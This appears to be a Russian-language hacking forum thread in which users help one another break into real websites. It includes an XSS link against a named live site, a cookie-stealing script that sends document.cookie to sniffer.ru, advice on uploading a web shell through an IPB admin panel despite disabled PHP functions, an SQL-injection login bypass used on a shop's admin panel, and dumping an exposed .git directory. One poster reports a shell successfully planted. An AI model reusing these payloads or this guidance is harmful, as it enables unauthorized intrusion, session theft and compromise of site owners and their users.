в таких файлах бывает можно найти пути к интересным файлам, через которые можно залиться. но если там только пути к плагинам, то вряд ли что-то можно сделать, кроме как проверить их на уязвимости
пробовал, но похоже что в сам .git Forbidden You don't have permission to access /.git/ on this server. , а если добавить /index, то качается файл index размером чуть больше 450кб
вообщем загрузил файл в git репозиторий, получил список, затем git checkout db-config.php и ничего не происходит. Все команды делаю в репозитории. Git выдаст сообщение об ошибке, т.к. запрашиваемый объект отсутствует в локальном репозитории этого не происходит Что я делаю не так?
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.
Если я правильно понял Code: http://www.alfa.com.tw/search.php?keyword="><script>document.location.href='http://google.com'</script> Проверял только в тор-браузере. Работает.
может вы имеете ввиду window.location? какая атака? кража кук? <script>window.location = "http://sniffer.ru/?"+document.cookie</script>
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, Какие варианты могут быть залития шелла, ипб fopen не пашет)
php код значит выполнять можно? раз говоришь fopen не пашет file_put_contents ? может просто прав на запись нет? вообще среди запрещенных функций не вижу system/passthru, может сразу с консолью работать?
Добрый вечер, спасибо вам за ответ. Файл создается, но вот беда, в него ничего не записывается. Что может быть причиной? ps: я еще нахожусь в админки ipb, заливаю через настройки, файл создается но в него ничего не записывается.
Есть еще один вопрос, вообщем попробую вам объяснить ситуацию, есть сайт моментальных товаров, лазил по нему нашел одну уязвимость как я понимаю sql уязвимость! В административной панели в авторизации мною была найдена ошибка, а именно когда я подставлял за место логина и пароля " ' OR 'a'='a ", то я проходил авторизацию, но на данном веб-сервере имеются еще сайты/форумы и все они созданы под одним аккаунтом, мне необходимо вытащить данные что бы залить к примеру шелл, в админки вообще нету никаких заливалок файлов, а главное если я допустим вставляю "<?" то данный код сразу обрезается, попробовал разные варианты.))) Авторизация в modal окне происходит. sqlmap пробывал, но на сервере защита от дддоса, и сразу banned ip ;( Очень необходима ваша помощь, заранее благодарю, каждому ответившему плюсик в карму.
Если вы банальным способом прошли авторизацию, значит вся админка кишит SQL-иньекциями, вот в ней и ковыряйтесь, может есть где файл конфига смены логин пасса? который скрыт под звездочками, а может и локальный инклуд заваляться при редактирование каких либо модулей, плагинов, вообщем без фантазии вы дальше не продвинитесь)) если файл создается значит идет выполнение кода, но что то у вас идет не так, попробуйте в сам файл куда вы вписываите код вставить сам шелл, как пример с тем же выводом по ГЕТ запросу, для мение палевности... Вариантов море, учитесь смотреть другие разделы, гуглить, https://forum.antichat.ru/threads/307894/ - Не стандартные способы заливки шелла Вариантов море!
Спасибо поставил вам, шелл действительно удалось залить. По поводу первого сайта, уязвимостей как раз больше и нету, только она одна была. Что можете посоветовать?